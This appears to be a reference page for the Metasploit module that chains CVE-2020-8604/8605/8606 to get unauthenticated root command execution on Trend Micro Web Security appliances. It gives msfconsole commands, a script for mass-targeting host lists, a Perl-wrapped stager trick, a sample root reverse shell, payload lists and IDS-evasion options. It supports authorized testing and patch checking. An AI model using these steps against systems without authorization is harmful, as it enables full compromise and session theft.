Trend Micro Web Security (Virtual Appliance) Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/trendmicro_websecurity_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Trend Micro Web Security (Virtual Appliance) Remote Code Execution
Module: exploit/linux/http/trendmicro_websecurity_exec
Source code: modules/exploits/linux/http/trendmicro_websecurity_exec.rb
Disclosure date: 2020-06-10
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): python
Supported platform(s): Python
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-8604, CVE-2020-8605, CVE-2020-8606

This module exploits multiple vulnerabilities together in order to achive a remote code execution. Unauthenticated users can execute a terminal command under the context of the root user. The specific flaw exists within the LogSettingHandler class of administrator interface software. When parsing the mount_device parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability. Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this vulnerability in order to communicate with internal services in the product. Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the IWSS user. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user. Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using trendmicro_websecurity_exec against a single host

Normally, you can use exploit/linux/http/trendmicro_websecurity_exec this way:

msf > use exploit/linux/http/trendmicro_websecurity_exec
msf exploit(trendmicro_websecurity_exec) > show targets
    ... a list of targets ...
msf exploit(trendmicro_websecurity_exec) > set TARGET target-id
msf exploit(trendmicro_websecurity_exec) > show options
    ... show and set options ...
msf exploit(trendmicro_websecurity_exec) > exploit

Using trendmicro_websecurity_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your trendmicro_websecurity_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/trendmicro_websecurity_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits multiple vulnerabilities together in order to achieve remote code execution in Trend Micro Web Security. Unauthenticated users can execute a terminal command under the context of the root user.

The specific flaw exists within the LogSettingHandler class of administrator interface software. When parsing the mount_device parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability.

Another specific flaw exists within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this vulnerability to communicate with internal services in the product.

Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.

Due to a combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.

Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.

Vulnerable Application Installation Steps

Trend Micro Web Security is distrubed as an ISO image by Trend Micro.

The following steps are valid on the CentOS 6 x64 bit operating system.

  1. Open following URL http://downloadcenter.trendmicro.com/
  2. Find "InterScan Web Security Virtual Appliance" and click.
  3. Go to Service Pack section.
  4. At the time of writing this documentation, you must see IWSVA-6.5-SP2-1548-x86_64.iso next to Download button.
  5. Click to the download button and complete installation of ISO.

https://files.trendmicro.com/products/iwsva/6.5/IWSVA-6.5-SP2-1548-x86_64.iso

System settings used for installation: - Virtualbox or VMware can be used. - 8 GB of memory at least. - 60 GB of disk size at least.

Why perl wrapper for python stager?

Within the exploit function, you can see a custom Perl wrapper usage for python stager payload. The parameter that contains our payload is going through escaping (double quotes, backslash, etc) and blacklist checks on the server-side. Most of the cmd payload will not work under these circumstances.

I love meterpreter <3 Using python dropper, which gives a meterpreter session, with command injection vulnerability requires using a double quote or Single-Backslash-Single-Single combination.

python -c '#{payload.encoded'
"python -c '#{payload.encoded.gsub("'", "'\\\\''")}'"

In that specific case, none of these approaches works. The idea is wrapping the python dropper within the perl command that does not contain any special characters.

Verification Steps


  1. Start msfconsole
  2. Run use exploit/linux/http/trendmicro_websecurity_exec
  3. Set RHOST
  4. Set LHOST
  5. Run check
  6. Verify that you are seeing The target is vulnerable.
  7. Run exploit
  8. You should get a root shell

Scenarios


Trend Micro Web Security 6.5-SP2_Build_Linux_1852

msf5 > use exploit/linux/http/trendmicro_websecurity_exec
msf5 exploit(linux/http/trendmicro_websecurity_exec) > set RHOSTS 192.168.74.31
RHOSTS => 192.168.74.31
msf5 exploit(linux/http/trendmicro_websecurity_exec) > set LHOST 172.31.224.186 
LHOST => 172.31.224.186
msf5 exploit(linux/http/trendmicro_websecurity_exec) > check

[*] Trying to extract session ID by exploiting reverse proxy service
[+] Extracted number of JSESSIONID : 16
[*] Testing JSESSIONID #0 : 132B2651F070E865A646F3ABA681769A
[+] Awesome !!! JESSIONID #0 is active.
[+] 192.168.74.31:8443 - The target is vulnerable.
msf5 exploit(linux/http/trendmicro_websecurity_exec) > run

[*] Started reverse TCP handler on 172.31.224.186:4444 
[*] Trying to extract session ID by exploiting reverse proxy service
[+] Extracted number of JSESSIONID : 16
[*] Testing JSESSIONID #0 : 132B2651F070E865A646F3ABA681769A
[+] Awesome !!! JESSIONID #0 is active.
[*] Exploiting command injection vulnerability
[*] Sending stage (53755 bytes) to 172.31.224.1
[*] Meterpreter session 1 opened (172.31.224.186:4444 -> 172.31.224.1:53061) at 2020-06-18 20:10:29 +0300

meterpreter > shell
Process 40116 created.
Channel 1 created.
sh: no job control in this shell
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),499(iscan)
sh-4.1#

Go back to menu.

Msfconsole Usage


Here is how the linux/http/trendmicro_websecurity_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/trendmicro_websecurity_exec

[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/trendmicro_websecurity_exec) > show info

       Name: Trend Micro Web Security (Virtual Appliance) Remote Code Execution
     Module: exploit/linux/http/trendmicro_websecurity_exec
   Platform: Python
       Arch: python
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-06-10

Provided by:
  Mehmet Ince <[email protected]>

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  PROXY_PORT  8080             yes       Port number of Trend Micro Web Filter Proxy service
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT       8443             yes       The target port (TCP)
  SSL         true             no        Negotiate SSL/TLS for outgoing connections
  VHOST                        no        HTTP server virtual host

Payload information:

Description:
  This module exploits multiple vulnerabilities together in order to 
  achive a remote code execution. Unauthenticated users can execute a 
  terminal command under the context of the root user. The specific 
  flaw exists within the LogSettingHandler class of administrator 
  interface software. When parsing the mount_device parameter, the 
  process does not properly validate a user-supplied string before 
  using it to execute a system call. An attacker can leverage this 
  vulnerability to execute code in the context of root. But 
  authentication is required to exploit this vulnerability. Another 
  specific flaw exist within the proxy service, which listens on port 
  8080 by default. Unauthenticated users can exploit this 
  vulnerability in order to communicate with internal services in the 
  product. Last but not least a flaw exists within the Apache Solr 
  application, which is installed within the product. When parsing the 
  file parameter, the process does not properly validate a 
  user-supplied path prior to using it in file operations. An attacker 
  can leverage this vulnerability to disclose information in the 
  context of the IWSS user. Due to combination of these 
  vulnerabilities, unauthenticated users can execute a terminal 
  command under the context of the root user. Version perior to 6.5 
  SP2 Patch 4 (Build 1901) are affected.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-8604
  https://nvd.nist.gov/vuln/detail/CVE-2020-8605
  https://nvd.nist.gov/vuln/detail/CVE-2020-8606
  http://www.zerodayinitiative.com/advisories/ZDI-20-676
  http://www.zerodayinitiative.com/advisories/ZDI-20-677
  http://www.zerodayinitiative.com/advisories/ZDI-20-678

Module Options


This is a complete list of options available in the linux/http/trendmicro_websecurity_exec exploit:

msf6 exploit(linux/http/trendmicro_websecurity_exec) > show options

Module options (exploit/linux/http/trendmicro_websecurity_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   PROXY_PORT  8080             yes       Port number of Trend Micro Web Filter Proxy service
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       8443             yes       The target port (TCP)
   SSL         true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                        no        HTTP server virtual host

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/http/trendmicro_websecurity_exec exploit:

msf6 exploit(linux/http/trendmicro_websecurity_exec) > show advanced

Module advanced options (exploit/linux/http/trendmicro_websecurity_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                30                                                  no        Additional delay in seconds to wait for a session

Payload advanced options (python/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpCookie                                    no        An optional value to use for the Cookie HTTP header
   HttpHostHeader                                no        An optional value to use for the Host HTTP header
   HttpReferer                                   no        An optional value to use for the Referer HTTP header
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PythonMeterpreterDebug       false            no        Enable debugging for the Python meterpreter
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/trendmicro_websecurity_exec module can exploit:

msf6 exploit(linux/http/trendmicro_websecurity_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/trendmicro_websecurity_exec exploit:

msf6 exploit(linux/http/trendmicro_websecurity_exec) > show payloads

Compatible Payloads
===================

   #   Name                                         Disclosure Date  Rank    Check  Description
   -   ----                                         ---------------  ----    -----  -----------
   0   payload/generic/custom                                        normal  No     Custom Payload
   1   payload/generic/shell_reverse_tcp                             normal  No     Generic Command Shell, Reverse TCP Inline
   2   payload/multi/meterpreter/reverse_http                        normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   3   payload/multi/meterpreter/reverse_https                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   4   payload/python/meterpreter/reverse_http                       normal  No     Python Meterpreter, Python Reverse HTTP Stager
   5   payload/python/meterpreter/reverse_https                      normal  No     Python Meterpreter, Python Reverse HTTPS Stager
   6   payload/python/meterpreter/reverse_tcp                        normal  No     Python Meterpreter, Python Reverse TCP Stager
   7   payload/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Meterpreter, Python Reverse TCP SSL Stager
   8   payload/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Meterpreter, Python Reverse TCP Stager with UUID Support
   9   payload/python/meterpreter_reverse_http                       normal  No     Python Meterpreter Shell, Reverse HTTP Inline
   10  payload/python/meterpreter_reverse_https                      normal  No     Python Meterpreter Shell, Reverse HTTPS Inline
   11  payload/python/meterpreter_reverse_tcp                        normal  No     Python Meterpreter Shell, Reverse TCP Inline
   12  payload/python/pingback_reverse_tcp                           normal  No     Python Pingback, Reverse TCP (via python)
   13  payload/python/shell_reverse_tcp                              normal  No     Command Shell, Reverse TCP (via python)
   14  payload/python/shell_reverse_tcp_ssl                          normal  No     Command Shell, Reverse TCP SSL (via python)
   15  payload/python/shell_reverse_udp                              normal  No     Command Shell, Reverse UDP (via python)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/trendmicro_websecurity_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/trendmicro_websecurity_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Target is unreachable.


Here is a relevant code snippet related to the "Target is unreachable." error message:

107:	    datastore['SSL'] = true if ssl_restore
108:	    datastore['RPORT'] = port_restore
109:	
110:	    # Routine check on res object
111:	    unless res
112:	      fail_with(Failure::Unreachable, 'Target is unreachable.')
113:	    end
114:	
115:	    # If the res code is not 200 that means proxy service is not vulnerable.
116:	    unless res.code == 200
117:	      @jsessionid = -1

System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.


Here is a relevant code snippet related to the "System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in." error message:

121:	    # Now we are going to extract all JESSIONID from log file and store them in array.
122:	    cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten
123:	
124:	    if cookies.empty?
125:	      @jsessionid = 0
126:	      print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')
127:	      return
128:	    end
129:	
130:	    print_good("Extracted number of JSESSIONID: #{cookies.length}")
131:	

Target is unreachable.


Here is a relevant code snippet related to the "Target is unreachable." error message:

144:	        'cookie' => "JSESSIONID=#{cookie}"
145:	      })
146:	
147:	      # Routine res check
148:	      unless res
149:	        fail_with(Failure::UnexpectedReply, 'Target is unreachable.')
150:	      end
151:	
152:	      # If the cookie is active !
153:	      if res.code == 200 && res.body.include?('session_flag')
154:	        print_good("Awesome!!! JESSIONID ##{index} is active.")

JSESSIONID #<INDEX> is inactive! Moving to the next one.


Here is a relevant code snippet related to the "JSESSIONID #<INDEX> is inactive! Moving to the next one." error message:

154:	        print_good("Awesome!!! JESSIONID ##{index} is active.")
155:	        @jsessionid = cookie
156:	        break
157:	      end
158:	
159:	      print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
160:	    end
161:	
162:	    if @jsessionid.empty?
163:	      print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')
164:	    end

System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.


Here is a relevant code snippet related to the "System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login." error message:

158:	
159:	      print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
160:	    end
161:	
162:	    if @jsessionid.empty?
163:	      print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')
164:	    end
165:	  end
166:	
167:	  def check
168:	    #

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

188:	    end
189:	  end
190:	
191:	  def exploit
192:	    unless check == CheckCode::Vulnerable
193:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
194:	    end
195:	
196:	    #
197:	    # 0     => Proxy service is vulnerable, but catalina.out does not contain any
198:	    # jessionid string yet !

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.